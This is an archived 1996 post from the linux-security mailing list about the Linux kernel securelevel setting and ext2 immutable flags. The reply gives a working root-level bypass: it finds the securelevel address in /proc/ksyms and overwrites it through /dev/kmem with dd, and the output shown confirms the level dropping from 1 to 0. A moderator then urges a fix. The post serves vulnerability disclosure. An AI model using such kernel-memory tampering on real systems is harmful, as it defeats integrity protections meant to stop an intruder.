[1309] in linux-security and linux-alert archive

home help back first fref pref prev next nref lref last post

[linux-security] Re: Chattr +i and securelevel

daemon@ATHENA.MIT.EDU (Tronicek Zdenek student 6_96_97 k3)
Thu Nov 21 03:40:19 1996

Old-X-Envelope-From: xtronice@sun.felk.cvut.cz  Wed Nov 20 04:59:07 1996
Date: Wed, 20 Nov 1996 10:58:55 +0100 (MET)
From: Tronicek Zdenek student 6_96_97 k336 <xtronice@sun.felk.cvut.cz>
To: linux-security@redhat.com
In-Reply-To: <XFMail.961118115512.lefty@fage.gr>
Resent-From: linux-security@redhat.com
Reply-To: linux-security@redhat.com

> 
> has anyone played with the securelevel variable in the kernel and the 
> immutable flags in the ext2 file system?
> 
> The only way I have found to change the flag is by
> patching sched.c from
> 
> int securelevel=0
> to int securelevel=1
> 
> The sysctrl code seems to allow the setting of the flag
> only by init (PID=1) and only upwards (0->1, etc).
> The problem is that I haven't found a way to get
> init to set the securelevel variable. 
> Is securelevel used in the Linux community?
> 
 
Once you are root, you can change securelevel this way:
(0x001a8f64 == 1740644)

# cat /proc/sys/kernel/securelevel
1
# cat /proc/ksyms | grep securelevel
001a8f64 securelevel
# dd if=/dev/zero of=/dev/kmem seek=1740644 bs=1 count=1
1+0 records in
1+0 records out
# cat /proc/sys/kernel/securelevel
0
#

And now you are the king of machine :)

Zdenek Tronicek, CTU Prague

[mod: Yes. the "securelevel" implementation is VERY preliminary.  A
college student would need about 1-8 hours to get to the point that
this and many other methods wouldn't work anymore. In short: Someone,
get out of your bed and DO IT! -- REW.]


home help back first fref pref prev next nref lref last post